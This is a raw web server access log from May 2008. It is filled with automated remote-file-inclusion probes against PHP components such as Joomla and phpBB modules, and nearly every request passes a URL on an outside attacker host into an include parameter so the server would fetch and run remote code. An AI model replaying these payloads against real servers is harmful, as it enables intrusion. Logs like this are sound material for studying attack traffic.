85.25.145.85 - - [06/May/2008:11:11:12 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:11:28 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:11:39 -0700] "GET /logs/access_080324.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.228.20 - - [06/May/2008:11:11:46 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://guppy.mpe.nus.edu.sg/senzh/? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.228.20 - - [06/May/2008:11:11:47 -0700] "GET //trans/trans.php?trans=eng&page=http://guppy.mpe.nus.edu.sg/senzh/? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [06/May/2008:11:11:55 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:12:12 -0700] "GET /logs//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:12:13 -0700] "GET //db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:12:47 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:12:50 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:12:54 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:12:54 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:12:54 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:13:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:13:13 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:13:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:13:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:13:16 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:13:30 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:13:31 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:13:31 -0700] "GET /logs//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:13:31 -0700] "GET //db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:13:34 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:13:35 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:13:35 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:14:04 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:14:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:14:12 -0700] "GET /logs/access_080226.log//components/com_simpleboard/file_upload.php?sbp=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:14:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:14:40 -0700] "GET /logs/access_071224.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.92.59.57 - - [06/May/2008:11:14:42 -0700] "GET /logs/access_080215.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:14:59 -0700] "GET /logs/access_071225.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:14:59 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:15:00 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:11:15:31 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:11:15:32 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:11:15:33 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:15:41 -0700] "GET /logs/access_080201.log/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:15:42 -0700] "GET /logs/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:11:16:03 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:11:16:05 -0700] "GET /logs/access_080308.log/index.php?side=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:11:16:10 -0700] "GET /logs/index.php?side=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:11:16:14 -0700] "GET /index.php?side=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:16:18 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:16:18 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:16:19 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:16:43 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:16:43 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:16:43 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:16:54 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.225.246.28 - - [06/May/2008:11:16:56 -0700] "GET /logs/faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:16:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.225.246.28 - - [06/May/2008:11:16:56 -0700] "GET /faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:17:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:17:12 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:17:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
61.63.9.163 - - [06/May/2008:11:17:17 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:17:39 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:17:40 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:11:17:52 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:18:10 -0700] "GET /logs/access_080213.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:18:12 -0700] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:18:12 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:18:12 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:18:21 -0700] "GET /logs/access_071129.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:18:22 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:18:23 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:18:24 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:18:24 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.9.37 - - [06/May/2008:11:18:42 -0700] "GET /logs/access_071030.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:18:48 -0700] "GET /logs/access_071116.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:19:32 -0700] "GET /logs//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:19:32 -0700] "GET //db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:19:36 -0700] "GET /logs/access_080201.log//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:20:10 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:20:11 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:20:42 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:20:42 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:20:42 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:20:42 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:20:42 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:20:42 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:20:46 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:20:47 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:20:47 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:21:09 -0700] "GET //index2.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:21:10 -0700] "GET /logs//index2.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:21:30 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:21:30 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:21:31 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:21:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:21:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:21:50 -0700] "GET /logs/access_080111.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:21:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:21:51 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:57 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:57 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:58 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:58 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:59 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:21:59 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:22:00 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:22:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:22:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:11:22:06 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:11:22:07 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:11:22:07 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:22:13 -0700] "GET /logs//eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:22:13 -0700] "GET /logs//eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:22:13 -0700] "GET //eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:22:13 -0700] "GET //eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:22:16 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:22:28 -0700] "GET /logs/index.php?go=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:22:32 -0700] "GET /index.php?go=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:22:37 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.168 - - [06/May/2008:11:22:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/?N=D HTTP/1.0" 200 4809 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:23:02 -0700] "GET /logs/access_080311.log//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:23:02 -0700] "GET //db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:23:02 -0700] "GET /logs//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
